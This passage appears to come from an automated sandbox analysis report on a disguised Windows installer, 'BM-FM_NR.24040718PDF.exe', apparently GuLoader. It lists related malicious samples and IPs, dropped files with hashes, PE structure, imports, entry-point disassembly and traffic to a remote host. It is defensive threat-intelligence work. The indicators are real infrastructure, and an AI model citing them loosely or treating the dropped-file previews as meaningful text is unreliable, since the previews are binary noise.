                                                  INTERQGMOInternetIncJPshipping document.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 118.27.122.214
                                                  shipping document.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 157.7.107.63
                                                  tajma.x86-20240422-0535.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 118.27.80.227
                                                  QXeoSsX87R.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                  • 157.7.100.23
                                                  mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 157.7.79.166
                                                  arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 157.7.100.11
                                                  240330_unpackedGet hashmaliciousUnknownBrowse
                                                  • 157.7.189.53
                                                  Dokument-99373.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 157.7.189.60
                                                  mrPTE618YB.exeGet hashmaliciousPureLog StealerBrowse
                                                  • 160.251.83.161
                                                  ARKublg5Cr.exeGet hashmaliciousFormBookBrowse
                                                  • 150.95.255.38
                                                  BCPL-SGBGPNETGlobalASNSGPO_PDF24172024.scr.exeGet hashmaliciousFormBookBrowse
                                                  • 134.122.178.172
                                                  rFV23+17555.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                  • 134.122.178.173
                                                  SecuriteInfo.com.FileRepMalware.1008.15763.exeGet hashmaliciousUnknownBrowse
                                                  • 1.32.247.27
                                                  RFQ.exeGet hashmaliciousFormBookBrowse
                                                  • 134.122.178.172
                                                  fedex awb &Invoice.vbsGet hashmaliciousFormBookBrowse
                                                  • 134.122.178.171
                                                  https://euet-ss.xyz/Login/register/Lang/en-usGet hashmaliciousUnknownBrowse
                                                  • 216.83.40.249
                                                  https://smbc-waz12.shop/Get hashmaliciousUnknownBrowse
                                                  • 134.122.188.167
                                                  https://www.wangyubo001.com/loginGet hashmaliciousUnknownBrowse
                                                  • 134.122.186.220
                                                  https://www.tietieclub.com/loginGet hashmaliciousUnknownBrowse
                                                  • 134.122.186.220
                                                  BoTl06PDGl.exeGet hashmaliciousFormBookBrowse
                                                  • 27.124.43.131
                                                  LIQUIDWEBUShttp://rum.browser-intake-foxbusiness.com:443Get hashmaliciousUnknownBrowse
                                                  • 72.52.178.23
                                                  http://browser-intake-foxbusiness.comGet hashmaliciousUnknownBrowse
                                                  • 72.52.178.23
                                                  https://yxv.ens.mybluehost.me/Ca/net/login.phpGet hashmaliciousUnknownBrowse
                                                  • 67.225.220.126
                                                  jqXe6tttFa.exeGet hashmaliciousPovlsomware, RansomeToadBrowse
                                                  • 67.225.218.22
                                                  jqXe6tttFa.exeGet hashmaliciousPovlsomware, RansomeToadBrowse
                                                  • 67.225.218.22
                                                  Oo2yeTdq5J.elfGet hashmaliciousMiraiBrowse
                                                  • 96.30.37.174
                                                  Invoice copy.pdf.exeGet hashmaliciousFormBookBrowse
                                                  • 67.225.137.57
                                                  http://www.indeks.pt/Get hashmaliciousUnknownBrowse
                                                  • 67.225.152.61
                                                  http://zacharryblogs.comGet hashmaliciousUnknownBrowse
                                                  • 72.52.179.174
                                                  https://www.idofea.org/idea-std-1010-inspection-standardGet hashmaliciousUnknownBrowse
                                                  • 209.59.137.47
                                                  OVHFRProSheets.msiGet hashmaliciousUnknownBrowse
                                                  • 217.182.69.200
                                                  bomgar-scc-w0eec30gdg6gx6wy8y6j8ddehxi7i1x5fwfex5jc40jc90.exeGet hashmaliciousUnknownBrowse
                                                  • 54.38.11.197
                                                  bomgar-scc-w0eec30gdg6gx6wy8y6j8ddehxi7i1x5fwfex5jc40jc90.exeGet hashmaliciousUnknownBrowse
                                                  • 54.38.11.197
                                                  v2cDqXmZtv.elfGet hashmaliciousMiraiBrowse
                                                  • 51.79.217.59
                                                  Wd2T9v9ZMT.elfGet hashmaliciousMiraiBrowse
                                                  • 51.79.217.59
                                                  7T1vOaCJto.elfGet hashmaliciousMiraiBrowse
                                                  • 51.79.217.59
                                                  Price request N#U00b0DEM23000199.jsGet hashmaliciousAsyncRAT, PureLog Stealer, RedLineBrowse
                                                  • 51.254.27.105
                                                  SecuriteInfo.com.Python.Stealer.1437.14994.32063.exeGet hashmaliciousPython StealerBrowse
                                                  • 151.80.29.83
                                                  SecuriteInfo.com.Win64.TrojanX-gen.22735.27744.exeGet hashmaliciousXmrigBrowse
                                                  • 54.37.232.103
                                                  _file____C__Users_hp_Downloads_C__Users_moodyt_AppData_Local_Temp_2_RemittanceAdvice17-Apr-2024.htmlGet hashmaliciousUnknownBrowse
                                                  • 51.222.241.106
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  37f463bf4616ecd445d4a1937da06e19Z4CYGTBlj7.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                  • 37.251.143.215
                                                  IPrstVM17M.exeGet hashmaliciousUnknownBrowse
                                                  • 37.251.143.215
                                                  IPrstVM17M.exeGet hashmaliciousUnknownBrowse
                                                  • 37.251.143.215
                                                  SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                  • 37.251.143.215
                                                  Zapytanie ofertowe Fl#U00e4ktGroup 04232024.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • 37.251.143.215
                                                  file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                  • 37.251.143.215
                                                  Umulighed.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • 37.251.143.215
                                                  rq0mVjR9ar.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                  • 37.251.143.215
                                                  responsibilityleadpro.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                  • 37.251.143.215
                                                  8jvTeVxooN.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                  • 37.251.143.215
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll4000382404CAPMO -PI SIMONE xlsx.exeGet hashmaliciousGuLoaderBrowse
                                                    QWZ-5664789.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                      RE_URGENT_INQUIRY_RFQ-03918.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        QWZ-5664789.exeGet hashmaliciousGuLoaderBrowse
                                                          RE_URGENT_INQUIRY_RFQ-03918.exeGet hashmaliciousGuLoaderBrowse
                                                            54XJmMikKc.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                              54XJmMikKc.exeGet hashmaliciousGuLoaderBrowse
                                                                9nd1wnVl4k.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  9nd1wnVl4k.exeGet hashmaliciousGuLoaderBrowse
                                                                    Process:C:\Windows\SysWOW64\write.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):122880
                                                                    Entropy (8bit):1.1414673161713362
                                                                    Encrypted:false
                                                                    SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                                    MD5:24937DB267D854F3EF5453E2E54EA21B
                                                                    SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                                    SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                                    SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):11264
                                                                    Entropy (8bit):5.771243767149499
                                                                    Encrypted:false
                                                                    SSDEEP:192:MPtkumJX7zB22kGwfy0mtVgkCPOs91un:9702k5qpds9Qn
                                                                    MD5:375E8A08471DC6F85F3828488B1147B3
                                                                    SHA1:1941484AC710FC301A7D31D6F1345E32A21546AF
                                                                    SHA-256:4C86B238E64ECFAABE322A70FD78DB229A663CCC209920F3385596A6E3205F78
                                                                    SHA-512:5BA29DB13723DDF27B265A4548606274B850D076AE1F050C64044F8CCD020585AD766C85C3E20003A22F356875F76FB3679C89547B0962580D8E5A42B082B9A8
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: 4000382404CAPMO -PI SIMONE xlsx.exe, Detection: malicious, Browse
                                                                    • Filename: QWZ-5664789.exe, Detection: malicious, Browse
                                                                    • Filename: RE_URGENT_INQUIRY_RFQ-03918.exe, Detection: malicious, Browse
                                                                    • Filename: QWZ-5664789.exe, Detection: malicious, Browse
                                                                    • Filename: RE_URGENT_INQUIRY_RFQ-03918.exe, Detection: malicious, Browse
                                                                    • Filename: 54XJmMikKc.exe, Detection: malicious, Browse
                                                                    • Filename: 54XJmMikKc.exe, Detection: malicious, Browse
                                                                    • Filename: 9nd1wnVl4k.exe, Detection: malicious, Browse
                                                                    • Filename: 9nd1wnVl4k.exe, Detection: malicious, Browse
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L....{.W...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):2336
                                                                    Entropy (8bit):4.858990231917197
                                                                    Encrypted:false
                                                                    SSDEEP:48:LVep1MZhyK04/M5zl1ByJAQay24eKnIsyH2wEIlJsHhljqTm6:LVGOZ/Az1yJAQleKfyWwtbsfqy6
                                                                    MD5:C8167C1894B7A1B86F47D0B94C9C5232
                                                                    SHA1:DDEA2EA111DC7FA03D64F630A2F87B05B5B69E32
                                                                    SHA-256:648D1F41365179F4B758244A68206D606737DA1759B46EE528EC7D0FA52A1121
                                                                    SHA-512:7D695BE9927F1969860D7A92086D1A062CE962DF3B60AB01287D1C73BC9A8314FF898343F4A836948F486EB4EC771B9482DF75C8696A39717E08194B062C0A8E
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:......U.b>..,.B`..........>......e.....M.....(..1....V.a.....B..9+.9U............7:......&..\...lg.......u.....+.P.............|........V3....................{..w?.Q........Q...E...'c......O.....QO.....1..}.........x....C...7....s.w.N<.......a%..B.......3.S.9........C............P..|F.0.....q)7......zv.wEN....cb.....5........P.......!@....-.33....`[.l........(..`.~.".....M...5.a............PJ............W..P.{.......>.f..1.......o.............SD....:..^...^......o....6......k...R...6.L....&..c.............#.M.J]d.....u..............l...............=.............V.........Q.....................0..$.._................Z........../..4..Y.....X.G..`g......................B...x.....o....E...hR;.Wo........^H......y4Z....[.._7......\k.f.H...f.'9...91....S.3..#....:.....N.3..'............b4.....k.....................7...fE....p....b...........6..........B...^:.............F@.............:.....Q..-@..YG.k..............E..-..i.L...j....r......8.....S9...........C>.z...~z.*..............
                                                                    Process:C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe
                                                                    File Type:ASCII text, with very long lines (346), with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):530
                                                                    Entropy (8bit):4.300207459626289
                                                                    Encrypted:false
                                                                    SSDEEP:12:L0r0S8X3YwM7ug7QKocU6QcwMAvXMoKMxdbPANbJ:orPs32ig7fod6QcU80xZP4bJ
                                                                    MD5:7C8C74A1071F35A3E51307389CE95DC4
                                                                    SHA1:F3FBE7A0961DE881F05FDB21AA374648BC8A9542
                                                                    SHA-256:4EE060346428F790C5326B3B1FAC19834543B9D4DFAA932AFC5CCFA5AED645EE
                                                                    SHA-512:39484C9CDE71E529DAF7C641FA490164CA79D6B94781B861E90CBA891E94CBD6FD96F214C52CF0071EAA8A7E929FD08309323F8FFE9716BAB7E7EF3815D84538
                                                                    Malicious:false
                                                                    Preview:untranspiring privilegiesystemerne forlftet ddemandsknappernes unessentially uncrucified blindskak,supergood havannacigaren lithoed dormitorierne brugs glasnost,thewy mightless geopolitik tromlerevolveres,reoxygenizes fladbrndere pilraadden byfornyelser aabenraa untimedness skrvebelgningers smkfedt blase stannic plurivalve capitalisable betulin..oliesheik unsocializing roseate ergon,aktivers columbous skriftstbers acaulous calcanea faery ridebanernes fjermelsfabriks cykelhandlerenes interright sheikens faststoffysik karine..
                                                                    Process:C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):40138
                                                                    Entropy (8bit):4.580524719608896
                                                                    Encrypted:false
                                                                    SSDEEP:768:seh50doI2O71SG/d1bJAJ+5ARohedKPANhOvfl3INoo:dArFBhAeqylwf
                                                                    MD5:9C4C1E7CCDBD9696C2E4B0EAC1C43B7E
                                                                    SHA1:0D871B669670205ED5B1D4687A166840FDFA6BAF
                                                                    SHA-256:430BCE0A45242622354B92EA88BBA47E636ADDEFFBF7DEAAD79649760B3B60EF
                                                                    SHA-512:2D9EE03E221E2BB581B475A4C3DE83A13E8970025D6B9C7C6DD1A600FB09D59F3F7C57CFBA7BEE5E651596997F084FC95F08814C74A57D19113240957E74E255
                                                                    Malicious:false
                                                                    Preview:....33....................................................?.......KK..........u.....RRR....^.............cc............s.#........................e...................j..s..........\.q.....dd...........I.2..........a.##......../.g....QQQQ...4...................e......S....&&&&.....B............||.}}}.......)...U................D..............{{.hhhh.r...U...........................[[.......YY....ggg.DD.C.....????..vv...s.....,,..........j.3.....yy.......}.II.lllllllll.......................4......QQ.nnn.J......llll............SS2.......................P.......UU...................g.UU...................W....`...F.....:.6............................%%%%.....+...66.....||........''.....F...................99.:...PP..........vvvv...........................oo............lll..........cccc.....AAAA....S...333........O.......q..||.tttt....Q............__......................:::.............ah....kkkkk. ..@...b...BBB............Q...............3.....{....K.....iiiii.........l.m...No...........
                                                                    Process:C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):2324
                                                                    Entropy (8bit):4.873274767145919
                                                                    Encrypted:false
                                                                    SSDEEP:48:g1OGHxCkTqE65bauLZHv3dFZeloeaFBvOoGxxIgvGJzztJN7aYZK:gEMCwqj5bHLjTF2tIg8zztTDE
                                                                    MD5:E434936393A7FD7565EDA222B947C90E
                                                                    SHA1:DCC61C436D4C63B2BF00982503C509F727F58AB6
                                                                    SHA-256:AF3C4EBF9D8448367FD6CEE7B235F7CB0EE0CCECDB52019A2F1829587D309D26
                                                                    SHA-512:EB5C3CAAE13647803F4F3EB18246A37EB53504F84E451DC6F4B2C698AD756D62B8CDA6CE8049B15AF34C4A31DD0FD1860B54C9123D313ABC2DD8BB276344982C
                                                                    Malicious:false
                                                                    Preview:n.......b.V..kx.......................+..J.~.;..U..v......._......Fp......... ....@...)..O....._........*......Y.\.....m...=.I..X............:.....nP.c..._........>...-.........E.....'%.....b..@...@.....^.b.-.........../....Z..B...{.[...!X.4..[.........L/.C$k...........2...................p.....c.U.....e.9....;K....6q...9.........7.........Y.........4..).\........K.N.A..K...................Jn..s....)...... ...................3A.............mf...$.2...-.......{,.^..........Lk......(.......4.X...K!.......=...Y....&............(...hV...'...........Q....3.......[...g.t....................?........a.......g.l....0...k.........m............C.l.\......H.|..........K.R&).Gd.M...|.O..u.o..............?<..G...^..S...........y....O..]w*$............s......)u......./...........>.'......\.....f.......;...`{..............}.;+....;7.....^....I................h....8..E.#~........X......m.............K.<..AP..ha.....p...."......(..D.........Ux....L....2{..o...............Vg...............
                                                                    Process:C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):446558
                                                                    Entropy (8bit):6.957170164856061
                                                                    Encrypted:false
                                                                    SSDEEP:6144:+DbELmSx1Im4ZBABBEOULZBxfXFnXtZPCG5jfUitroHYRqjk/YwVFl:+DbELjXIfB0ElrfXNtHrUYRtrz
                                                                    MD5:9A15978DD58DF677CA039DF24AB2B1D2
                                                                    SHA1:3CD72CAFF8D25D64327263A2955B79324F0E9930
                                                                    SHA-256:93068FC74F7ED1692FA3E91827039A964AA5E4B0445DB2EC8B7FB85BC0DA50AB
                                                                    SHA-512:DE3345526105FF85D7BD37F96CC9FD0D608CB1B4A9F5E3F61C833D353D66670A09E4D4C90D2D724E5ABEA953120ED4DCAD4DC91C95F826E6624FE31FE49459EF
                                                                    Malicious:false
                                                                    Preview:............#.......???..........f.b..Pl.A^............................................................................<C.....r.b..................................................................................................................av.t..f....4(.....................................................k...f.f..P.*.....................................................................................1b.!'...................................................r.k.k..q;.........................................................................................................+.....f....Fn..x..................................................................!.f......f.W. ........................................................................................................`&.{..................................................................................................p..f....ed..m.......................................................................................................d..X
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                    Entropy (8bit):6.872014983557189
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:BM-FM_NR.24040718PDF.exe
                                                                    File size:646'803 bytes
                                                                    MD5:7206084219e20fe7575aec63a3422a5c
                                                                    SHA1:930508090c6ec226838189c1d6ca32035c2ac0ed
                                                                    SHA256:3fb935f3b274dddf25a926967ceb573ad0f990bff966583157849545c60c42e4
                                                                    SHA512:dc7d9d8788531b9b127d905d04d1a6731bc2ae499f96dac485cb995f82a57490af77bf500c60f169d82eea6e3fe8b1fa0a8f18a54cdd7efdc84757475bb7ba51
                                                                    SSDEEP:6144:5z27B8gj9StARXpmTvIcw3/hxXYCckBWxTYDMnz5aO3xIiwETMAKo/x4Fl+c0XMF:hIXSQpmkBWxjniiwETmFmY
                                                                    TLSH:A6D44BA5A364CC7FF5D779B6D89AD03028ABBC4851E5510E129DB719A0B732200FFA1F
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....{.W.................`...|.....
                                                                    Icon Hash:044a486949496333
                                                                    Entrypoint:0x40310f
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x57807BD9 [Sat Jul 9 04:21:45 2016 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de
                                                                    Instruction
                                                                    sub esp, 00000184h
                                                                    push ebx
                                                                    push esi
                                                                    push edi
                                                                    xor ebx, ebx
                                                                    push 00008001h
                                                                    mov dword ptr [esp+18h], ebx
                                                                    mov dword ptr [esp+10h], 00409198h
                                                                    mov dword ptr [esp+20h], ebx
                                                                    mov byte ptr [esp+14h], 00000020h
                                                                    call dword ptr [004070A8h]
                                                                    call dword ptr [004070A4h]
                                                                    cmp ax, 00000006h
                                                                    je 00007FB7C8635693h
                                                                    push ebx
                                                                    call 00007FB7C8638601h
                                                                    cmp eax, ebx
                                                                    je 00007FB7C8635689h
                                                                    push 00000C00h
                                                                    call eax
                                                                    mov esi, 00407298h
                                                                    push esi
                                                                    call 00007FB7C863857Dh
                                                                    push esi
                                                                    call dword ptr [004070A0h]
                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                    cmp byte ptr [esi], bl
                                                                    jne 00007FB7C863566Dh
                                                                    push ebp
                                                                    push 00000009h
                                                                    call 00007FB7C86385D4h
                                                                    push 00000007h
                                                                    call 00007FB7C86385CDh
                                                                    mov dword ptr [0042E404h], eax
                                                                    call dword ptr [00407044h]
                                                                    push ebx
                                                                    call dword ptr [00407288h]
                                                                    mov dword ptr [0042E4B8h], eax
                                                                    push ebx
                                                                    lea eax, dword ptr [esp+38h]
                                                                    push 00000160h
                                                                    push eax
                                                                    push ebx
                                                                    push 00428828h
                                                                    call dword ptr [00407174h]
                                                                    push 00409188h
                                                                    push 0042DC00h
                                                                    call 00007FB7C86381F7h
                                                                    call dword ptr [0040709Ch]
                                                                    mov ebp, 00434000h
                                                                    push eax
                                                                    push ebp
                                                                    call 00007FB7C86381E5h
                                                                    push ebx
                                                                    call dword ptr [00407154h]
                                                                    Programming Language:
                                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x75340xa0.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x410000x42b88.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x5fdd0x600038462d04cfdbc4943d18be461d53cc3eFalse0.6783854166666666data6.499697507009752IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x70000x13520x14003d134ae5961af9895950a7ee0adc520aFalse0.4583984375data5.207538993430304IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0x90000x254f80x6002d00401e0c64d69b6d0ccb877d9f624eFalse0.4544270833333333data4.0323505938358934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .ndata0x2f0000x120000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x410000x42b880x42c002d987511830d1b6b38e140d79a789f40False0.12030372191011236data4.3412258414712035IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_ICON0x412080x42028Device independent bitmap graphic, 256 x 512 x 32, image size 262144EnglishUnited States0.11634168713199397
                                                                    RT_DIALOG0x832300x100dataEnglishUnited States0.5234375
                                                                    RT_DIALOG0x833300x11cdataEnglishUnited States0.6056338028169014
                                                                    RT_DIALOG0x834500xc4dataEnglishUnited States0.5918367346938775
                                                                    RT_DIALOG0x835180x60dataEnglishUnited States0.7291666666666666
                                                                    RT_GROUP_ICON0x835780x14dataEnglishUnited States1.1
                                                                    RT_VERSION0x835900x2b4dataEnglishUnited States0.4754335260115607
                                                                    RT_MANIFEST0x838480x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384
                                                                    DLLImport
                                                                    KERNEL32.dllSetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                                    USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                    SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                    ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Apr 24, 2024 12:27:26.969607115 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:26.969705105 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:26.969918966 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:26.994771957 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:26.994810104 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:28.052623987 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:28.052808046 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:28.098222971 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:28.098232985 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:28.098507881 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:28.098637104 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:28.101342916 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:28.148257017 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:28.450623989 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:28.450817108 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:28.797019958 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:28.797050953 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:28.797151089 CEST4435024437.251.143.215192.168.11.20
                                                                    Apr 24, 2024 12:27:28.797444105 CEST50244443192.168.11.2037.251.143.215
                                                                    Apr 24, 2024 12:27:28.797445059 CEST50244443192.168.11.2037.251.143.215
